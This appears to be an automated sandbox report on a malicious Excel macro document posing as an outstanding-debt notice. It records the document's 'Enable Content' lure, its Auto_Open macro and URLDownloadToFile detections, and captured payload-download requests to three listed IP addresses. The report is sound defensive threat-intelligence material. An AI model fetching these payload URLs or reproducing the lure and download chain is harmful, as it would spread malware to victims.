Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-1636503299-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-1636503299-05042021.xlsm
Analysis ID:404076
MD5:770ec8230138bb271c449bdaf5da519b
SHA1:21a0bde033c46eab8d42e5b6d9431f52f5c6ce48
SHA256:43c9954c68907acc1f1a6e7d5cc90a3043f9da1c8416b079d182865abea734c7
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: excel.exeMemory has grown: Private usage: 4MB later: 35MB
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.153.229.23Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 45.153.229.23
Source: unknownTCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknownTCP traffic detected without corresponding DNS query: 91.211.91.81
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B3C273.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.211.91.81Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.34.179.36Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.153.229.23Connection: Keep-Alive

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-1636503299-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_OpenName: Auto_Open
Source: Outstanding-Debt-1636503299-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outstanding-Debt-1636503299-05042021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD345.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1636503299-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting32Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-1636503299-05042021.xlsm0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://45.153.229.23/44313,6048108796.dat5%VirustotalBrowse
http://45.153.229.23/44313,6048108796.dat0%Avira URL Cloudsafe
http://5.34.179.36/44313,6048108796.dat3%VirustotalBrowse
http://5.34.179.36/44313,6048108796.dat0%Avira URL Cloudsafe
http://91.211.91.81/44313,6048108796.dat5%VirustotalBrowse
http://91.211.91.81/44313,6048108796.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://45.153.229.23/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://5.34.179.36/44313,6048108796.datfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://91.211.91.81/44313,6048108796.datfalse
  • 5%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
91.211.91.81
unknownUkraine
206638HOSTFORYUAfalse
5.34.179.36
unknownUkraine
204957GREENFLOID-ASUAfalse
45.153.229.23
unknownRussian Federation
25229VOLIA-ASUAfalse

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:404076
Start date:04.05.2021
Start time:17:30:37
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Outstanding-Debt-1636503299-05042021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.evad.winXLSM@1/8@0/3
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
GREENFLOID-ASUAtetup.exeGet hashmaliciousBrowse
  • 107.181.174.176
ba820cf3_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
a8331229_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
5f0e0f15_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
2f50000.exeGet hashmaliciousBrowse
  • 45.90.59.62
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
9177284661-04302021.xlsmGet hashmaliciousBrowse
  • 82.118.21.70
EgW5u2WYG2.exeGet hashmaliciousBrowse
  • 45.134.255.99
7IXb5bOTOQ.exeGet hashmaliciousBrowse
  • 45.134.255.61
DU61r0xvZ7.exeGet hashmaliciousBrowse
  • 82.118.23.184
TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
  • 91.90.195.7
10ba8cb2_by_Libranalysis.exeGet hashmaliciousBrowse
  • 195.123.238.191
SThy2G7fGR.exeGet hashmaliciousBrowse
  • 45.134.255.61
65cb803d8339bc32863bd557a882cf2016ad7945b18f3.exeGet hashmaliciousBrowse
  • 45.134.255.61
73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 45.90.59.97
73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 45.90.59.97
73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 45.90.59.97
kVXWdr5oFQ.exeGet hashmaliciousBrowse
  • 195.123.233.63
t.exeGet hashmaliciousBrowse
  • 195.123.237.105
HOSTFORYUAComplaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1770799750-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-1505499457-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-937314470-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
Complaint-793844517-04302021.xlsmGet hashmaliciousBrowse
  • 2.56.244.189
284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
284225b9_by_Libranalysis.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
9963433036-04282021.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
9963433036-04282021.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
9963433036-04282021.xlsmGet hashmaliciousBrowse
  • 91.211.91.71
7728839942-04012021.xlsmGet hashmaliciousBrowse
  • 91.211.91.69
7728839942-04012021.xlsmGet hashmaliciousBrowse
  • 91.211.91.69
VOLIA-ASUA7D1E.exeGet hashmaliciousBrowse
  • 77.123.139.190
2f50000.exeGet hashmaliciousBrowse
  • 91.203.5.165
jX16Cu330u.exeGet hashmaliciousBrowse
  • 77.123.139.190
5jHZqgYHCZ.exeGet hashmaliciousBrowse
  • 77.123.139.190
z3LOkpYy4s.exeGet hashmaliciousBrowse
  • 77.123.139.190
dl6jAtWJeR.exeGet hashmaliciousBrowse
  • 77.123.139.190
YVNw1T4L7m.exeGet hashmaliciousBrowse
  • 77.123.139.190
QsO4ETjF7s.exeGet hashmaliciousBrowse
  • 77.123.139.190
Rk5T3e6g5m.exeGet hashmaliciousBrowse
  • 77.123.139.190
9b3d7f02.exeGet hashmaliciousBrowse
  • 91.203.5.155
a5DohSoj1A.exeGet hashmaliciousBrowse
  • 77.123.139.190
Informationen,04.21.docGet hashmaliciousBrowse
  • 45.137.155.222
Informationen,04.21.docGet hashmaliciousBrowse
  • 45.137.155.222
Informationen,04.21.docGet hashmaliciousBrowse
  • 45.137.155.222
M04UQNhcL3.docmGet hashmaliciousBrowse
  • 45.137.155.37
M04UQNhcL3.docmGet hashmaliciousBrowse
  • 45.137.155.37
M04UQNhcL3.docmGet hashmaliciousBrowse
  • 45.137.155.37
hj4k7pqZ0S.docmGet hashmaliciousBrowse
  • 45.137.155.37
hj4k7pqZ0S.docmGet hashmaliciousBrowse
  • 45.137.155.37
3118626595-04152021.xlsmGet hashmaliciousBrowse
  • 45.153.229.88

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B3C273.jpg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category:dropped
Size (bytes):92379
Entropy (8bit):7.654577060340879
Encrypted:false
SSDEEP:1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5:4A425E6A5A885C0D0E2589506FD2244B
SHA1:E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256:76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512:3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious:false
Reputation:moderate, very likely benign file
Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
C:\Users\user\AppData\Local\Temp\A3EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):120456
Entropy (8bit):7.699429162181314
Encrypted:false
SSDEEP:3072:G1eQIbOz6NIrvKINbjvw548LMb/oqKO8NnS8+60Kcl:G1eROzmAbT648LM7D98Np+Ei
MD5:6C749CE0C8BFA7BFA04C3355CA83EDFB
SHA1:B1E7FAF52D7541D1481190E28D4BA195E1ABF43E
SHA-256:2D7D54F24D2D63A7BFCDFEE9F8CCFF675D0EBA9BD36CC8F89D031256CA073D20
SHA-512:007A5DAFD75E41F6FAE7E6C729FE0FC6B2A221F243684FE74B6FFA7692CCACC17BA7C57A7DD9F7716EF118C24DA219CB5C43A9910C465F6D2A0DB88A0A9B8CCF
Malicious:false
Reputation:low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):162688
Entropy (8bit):4.254358929051396
Encrypted:false
SSDEEP:1536:C6JL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CkJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:D908E0736D41F58F5938E9F740F4EB3E
SHA1:FC1B4B8AF0C482C2324D98E448324C793A7B2112
SHA-256:882196C7E244BE7E6E1843E2E98A2015C85940962CE58A68D4C592C75BB9D0A2
SHA-512:107331B1FECE8AB0F844CB58E5BB53324EE131942B2F2631E0806A8FC85A7A89558CF29713FB33A1EA335813FA5FE42EB8EF9BC54D76287CA1ED8199DDCB049D
Malicious:false
Reputation:low
Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 23:31:43 2021, atime=Tue May 4 23:31:43 2021, length=8192, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.477057553097468
Encrypted:false
SSDEEP:12:85QMMk0LgXg/XAlCPCHaXtB8XzB/YFX+Wnicvb/bDtZ3YilMMEpxRljKTTdJP9TK:85rMV/XTd6jIYevDv3qKrNru/
MD5:46612982C3AEA7317186DC5DA10101C6
SHA1:0B9E2315BCDC24D90412B0D098F9B2262A42CA64
SHA-256:3E5D988D0EC298A68A4EE4B48096FB2F76BCC4F18F06437E6F7ECB587EFC328F
SHA-512:A99F54818821285A0D4C0476E542D658A37F1DB60F974F4D1D45BECC6D43D4068EAB0A8DDDB1ED76939CC2CEF5303EFEF2A6B91B8F321CF0B244D10D8B3DC729
Malicious:false
Reputation:low
Preview: L..................F...........7G...c*.FA...c*.FA... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1636503299-05042021.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue May 4 23:31:43 2021, atime=Tue May 4 23:31:43 2021, length=120466, window=hide
Category:dropped
Size (bytes):2298
Entropy (8bit):4.55595359312966
Encrypted:false
SSDEEP:48:8W/XT0jFAIvD9N8MKQh2W/XT0jFAIvD9N8MKQ/:8W/XojFAIvBOMKQh2W/XojFAIvBOMKQ/
MD5:3930C7EBB382C712945355D6AD4381AD
SHA1:3C6D56327A74DDB308F2FDE2934C72521EC41A66
SHA-256:F43F3AA04AF32F5EDF50E79F1BB56343203D92E0399D228C8EA9D08EE5920548
SHA-512:B7C1DD9DABA0294A80500E4206A2BB693D18ED5C1886EEC9F4B8243459B87048812EFE249DDFACC81E0CFF6622C6F2FC24CA2AB87BA9B778BE23B15553D882A0
Malicious:false
Reputation:low
Preview: L..................F.... ......{...c*.FA....1.FA...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. 